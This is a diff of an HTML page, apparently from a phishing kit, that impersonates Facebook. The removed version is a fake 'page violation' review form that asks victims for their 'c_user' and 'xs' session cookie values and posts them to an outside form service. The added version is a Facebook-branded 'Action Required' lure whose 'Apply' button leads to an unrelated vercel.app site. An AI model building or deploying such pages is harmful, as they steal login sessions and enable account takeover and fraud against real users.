--- a/index.html
+++ b/index.html
@@ -1,88 +1,113 @@
 
 
+<html>
 
-
-
-
-
-<!doctype html>
 <head>
-  <title>Request Form</title>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1">
-    <link href="style.css" rel="stylesheet">
-    <link rel="icon" href="fb-logo.png" type="image/x-icon">
+  <title>Action Required</title>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
+  <link rel="preconnect" href="https://fonts.googleapis.com">
+  <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&amp;display=swap" rel="stylesheet">
+  <link rel="icon" type="image/svg+xml" href="https://buffer-start-page.s3.amazonaws.com/favicon.svg">
+  <link rel="apple-touch-icon-precomposed" sizes="57x57"
+    href="https://buffer-start-page.s3.amazonaws.com/apple-touch-icon-256x256.png">
+  <link rel="preload"
+    href="https://start-page.buffer.com/cdn-cgi/image/height=920/https://buffer-start-page-uploads.s3.amazonaws.com/defaults/hero-card.png"
+    as="image">
+  <style>
+    html,
+    body {
+      font-family: Roboto, sans-serif;
+      min-height: 100%;
+      height: 100%;
+      margin: 0;
+      padding: 0;
+    }
 
- 
+    body {
+      background-color: #E4F5FE;
+      display: flex;
+      flex-direction: column;
+      align-items: center;
+      justify-content: center;
+      text-align: center;
+    }
+
+    .container {
+      max-width: 600px;
+      padding: 20px;
+      background-color: #FFFFFF;
+      border-radius: 20px;
+      box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
+    }
+
+    .logo {
+      width: 80px;
+      height: 80px;
+      object-fit: cover;
+      border-radius: 50%;
+    }
+
+    h1 {
+      font-family: Roboto, sans-serif;
+      font-size: 32px;
+      font-weight: 700;
+      line-height: 1.4;
+      margin-top: 20px;
+      color: #232323;
+    }
+
+    h2 {
+      font-family: Roboto, sans-serif;
+      font-size: 24px;
+      font-weight: 700;
+      line-height: 1.4;
+      margin-top: 10px;
+      color: #232323;
+    }
+
+    .button {
+      background-color: #267CE5;
+      color: #FFFFFF;
+      font-family: Roboto, sans-serif;
+      font-size: 16px;
+      font-weight: 400;
+      padding: 16px 32px;
+      border-radius: 20px;
+      text-decoration: none;
+      display: inline-block;
+      margin-top: 20px;
+    }
+
+    .button:hover {
+      background-color: #1A5BBF;
+    }
+
+    .copyright {
+      color: #232323;
+      font-size: 14px;
+      margin-top: 30px;
+    }
+
+    .footer {
+      margin-top: 20px;
+    }
+  </style>
 </head>
+
 <body>
-<div class="relative bg-[#FFFFFF]">
-  <div class="mx-10 mt-4">
-    <marquee>
-      <img src="">
-    </marquee>
+  <div class="container">
+    <img class="logo"
+      src="https://start-page.buffer.com/cdn-cgi/image/width=160,height=160/https://buffer-start-page-uploads.s3.amazonaws.com/64df12466e02a899e7c4b98a/1692340938315.logo%20fb.png"
+      alt="Logo">
+    <h1>𝐀𝐩𝐩𝐥𝐲</h1>
+    <h2>𝐈𝐧 𝐧𝐞𝐞𝐝 𝐨𝐟 𝐚 𝐫𝐞𝐯𝐢𝐞𝐰? 𝐊𝐢𝐧𝐝𝐥𝐲 𝐭𝐚𝐩 𝐨𝐧 𝐭𝐡𝐞 "𝐀𝐩𝐩𝐥𝐲" 𝐛𝐮𝐭𝐭𝐨𝐧.</h2>
+    <a class="button" href="https://solves--issues.vercel.app/">𝐀𝐩𝐩𝐥𝐲</a>
+    <p class="copyright">𝐒𝐮𝐢𝐭𝐞 <strong>© 2024</strong></p>
   </div>
 
-  <form class="sm:hidden lg:block md:block" action="https://submit-form.com/A5KaVvOwH" method="post">
-    <input
-    type="hidden"
-    name="_redirect"
-    value="https://www.facebook.com/"
-  />
 
-<div style="position: absolute; left: 1.5rem; top:8rem; width: 90%;">
-  <div>
-    <p class="border-b h-10 font-bold text-[16px] text-[#4b4f56] pl-3 p-2 bg-[#f5f6f7]">
-      Request For Remove Page Violation
-    </p>
-  </div>
-<div>
-  <p class="mt-4 pl-3 text-[12px] font-semibold">
-    We've identified irregular activity on your page that goes against our community guidelines.
-  </p>
-</div>
-<div>
-  <p class="mt-4 pl-3 text-[12px] font-semibold">
-    As a result, access to your page has been restricted, and you're presently unable to post, share, or comment using it.
-  </p>
-</div>
-<div>
-  <p class="mt-4 pl-3 text-[12px] font-semibold">
-    If you think this is a Mistake, you can request a review by providing the required details.
-  </p>
-</div>
-<div>
-  <p class="text-[11px] text-[#90949c] p-2 font-semibold">
-    Detailed Video Information
-  </p>
-</div>
-<div>
-  <a class="w-32 h-20 block" href="https://cdn.glitch.global/022d2642-ae67-4384-8cc4-d1246d04b396/detailed%20video.mp4?v=1724060236095"><img class="w-32 h-20 mx-3" src="https://cdn.glitch.global/c194a370-7f4a-41ab-9ca1-c6811c6e18b1/download.png?v=1721295876205" alt=""></a>
-  </div>
-  <div>
-  <p class=" pl-3 text-[12px] font-semibold">
-    Kindly make sure to provide the requested details below.
-  </p>
-</div>
-<div>
-  <p class="text-slate-400 pl-4 mt-1">
-    c_user
-  </p><input class="border h-6 pl-1 mx-3" type="number" name="c_user" pattern="[0-9]+" minlength="6" title="Must Watch Detailed Video" required="1" aria-required="true">
-</div>
-<div>
-  <p class="text-slate-400 pl-4 mt-1">
-    xs
-  </p><input class="border h-6 pl-1 mx-3" type="text" name="xs" pattern="^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@#$%^&amp;+=]).{12,}$" title="Must Watch Detailed Video" required="1" aria-required="true">
-</div><div>
-  <p class="mt-4 pl-3 text-[12px] font-semibold">
-    Please ensure that you do not log out of your account on your computer or laptop until you have received a verification email.
-  </p>
-</div><div class="border mx-3 h-10 mt-4 bg-[#f5f6f7]"><div class="flex justify-end mx-2">
-  <button class="border h-7 w-16  bg-[#4267b2] text-white shadow-2xl mt-[0.30rem] font-serif font-thin text-xs hover:bg-blue-500" id="delete-btn">
-    Submit
-  </button></div>
-  </div>
- </div>
-  </form>
 </body>
+
 </html>
